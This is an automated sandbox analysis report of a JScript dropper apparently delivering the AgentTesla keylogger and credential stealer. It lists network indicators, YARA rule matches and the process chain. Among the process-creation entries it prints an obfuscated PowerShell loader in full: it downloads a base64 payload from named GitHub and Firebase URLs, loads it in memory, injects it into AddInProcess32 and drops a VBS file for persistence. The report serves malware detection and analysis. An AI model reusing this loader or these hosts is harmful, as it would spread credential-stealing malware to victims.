                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp

                  Software Vulnerabilities

                  Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  Source: C:\Windows\System32\wscript.exe | Network Connect: 188.114.97.3 443
                  Source: unknown | DNS query: name: paste.ee
                  Source: Yara match | File source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE
                  Source: alcatifa.vbs.12.dr | Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
                  Source: alcatifa.vbs.12.dr | Binary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
                  Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                  Source: Joe Sandbox View | ASN Name: TUT-ASUS
                  Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                  Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: unknown | DNS query: name: ip-api.com
                  Source: global traffic | HTTP traffic detected: GET /d/gvOd3 HTTP/1.1; Connection: Keep-Alive; Accept: */*; Accept-Language: en-CH; User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5); Host: paste.ee
                  Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global traffic | DNS traffic detected: DNS query: paste.ee
                  Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global traffic | DNS traffic detected: DNS query: ip-api.com
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00520000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://firebasestorage.googleapis.com
                  Source: AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002B96000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ip-api.comp
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D01ACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                  Source: wscript.exe, 00000000.00000003.1517826151.000001D52D429000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520130545.000001D52D429000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://paste.ee/
                  Source: wscript.exe, 00000000.00000003.1518428835.000001D52F330000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517658450.000001D52D466000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521404049.000001D52EE83000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520130545.000001D52D44E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517797280.000001D52D44D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517220439.000001D52EE7F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517618403.000001D52D455000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1517765900.000001D52D46C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1521135156.000001D52EE40000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520438484.000001D52D46D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://paste.ee/d/gvOd3
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D0170C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://raw.githubusercontent.com
                  Source: powershell.exe, 00000008.00000002.1489002671.000001FFE5CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00001000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002B96000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2549002759.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://account.dyn.com/
                  Source: powershell.exe, 00000008.00000002.1489002671.000001FFE5D01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1489002671.000001FFE5CE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee;
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00520000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://firebasestorage.googleapis.com
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00434000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/crypts2024.appspot.com/o/xavierorigin07102024.txt?alt=me
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D0122A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D01ACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1435738029.0000027D10072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.org
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D0175D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://oneget.orgX
                  Source: wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/gvOd3
                  Source: wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/gvOd3ee/dD
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516964493.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1520758800.000001D52D4C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/gvOd3t
                  Source: wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/zD
                  Source: wscript.exe, 00000000.00000002.1520580547.000001D52D490000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1516837297.000001D52D490000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee:443/d/gvOd3
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D01707000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercont
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D01685000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
                  Source: powershell.exe, 0000000B.00000002.1413532103.0000027D00223000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtC7I;
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
                  Source: wscript.exe, 00000000.00000003.1516670838.000001D52D4C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
                  Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
                  Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49709 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, oAKy.cs | .Net Code: ExGJKp0bbyd

                  System Summary

                  Source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE | Matched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: Server XML HTTP 6.0 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{88d96a0b-f192-11d4-a65f-0040963251e5}
                  Source: C:\Windows\System32\wscript.exe | COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FFAAC3912AD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 14_2_0293A6E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 14_2_02934A88
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 14_2_0293D958
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 14_2_02933E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 14_2_029341B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 14_2_06392300
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 14_2_06391150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 14_2_06393AB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 14_2_063933C8
                  Source: scan_374783.js | Initial sample: Strings found which are bigger than 50
                  Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 3509
                  Source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.powershell.exe.27d11278980.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 14.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                  Source: Process Memory Space: powershell.exe PID: 7176, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, ekKu0.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, vKf1z6NvS.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, ZNAvlD7qmXc.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, U2doU2.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, BgffYko.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, HrTdA63.cs | Cryptographic APIs: 'CreateDecryptor'
                  Source: 11.2.powershell.exe.27d11278980.0.raw.unpack, Vvp22TrBv9g.cs | Cryptographic APIs: 'TransformFinalBlock'
                  Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winJS@13/6@3/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0dogn2cd.zn2.ps1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BCE000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000E.00000002.2553669358.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js"
                  Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs"
                  Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                  Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\alcatifa.vbs"
                  Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: msxml6.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: winhttpcom.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: webio.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: dnsapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: rasadhlp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: schannel.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ntasn1.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ncrypt.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                  Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
